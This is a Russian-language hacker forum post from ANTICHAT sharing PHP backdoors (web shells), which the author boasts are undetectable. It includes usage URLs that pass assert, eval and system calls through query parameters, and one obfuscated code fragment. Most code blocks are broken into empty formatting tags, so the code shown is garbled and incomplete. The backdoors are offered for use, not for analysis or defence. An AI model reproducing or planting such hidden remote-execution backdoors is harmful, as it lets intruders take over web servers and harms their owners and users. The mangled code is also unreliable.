HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу [PHP] BackDoor's
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

  #1  
Старый 10.04.2015, 09:39
M.Billar
Познающий
Регистрация: 24.07.2013
Сообщений: 78
С нами: 6738806

Репутация: 0
По умолчанию
1) PHP-Backdoor, который ничем не палится и при этом выглядит не палевно. Вчера придумал

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"][/COLOR][/COLOR
Цитата:
Сообщение от Using  
index.php?large=assert&code=echo 123;
index.php?large=assert&code=system('echo 1;');
Могу поздравить себя с первым собственным пхп-бекдором.

2) Используем фичу обратных кавычек. Исполняет код передаваемый в параметре = названию переменной.

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][]=[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][]=@[/COLOR][COLOR="#0000BB"]_[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][((++[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"])+([/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]++ ))].=[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][]=++[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][]=[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][--[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]>>[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]].=(([/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"])+[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]]).([/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"])+[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]];[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]+[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]] =([/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]>>[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]]).([/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]]^[/COLOR][COLOR="#0000BB"]$_[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]][([/COLOR][COLOR="#0000BB"]$__[/COLOR][COLOR="#007700"]
[/COLOR][/COLOR
Цитата:
Сообщение от Using  
file.php?0=НАЗВАНИЕ_ФУНКЦИИ&1=ДА НЫЕ ДЛЯ ФУНКЦИИ
file.php?0=assert&1=phpinfo();
file.php?0=eval&1=echo 1;
4) PHP-Backdoor, спасибо тебе, типизация которой нет

PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR
Цитата:
Сообщение от Using  
file.php?f=assert&c=phpinfo();
file.php?f=eval&c=echo 1;
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием
 



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.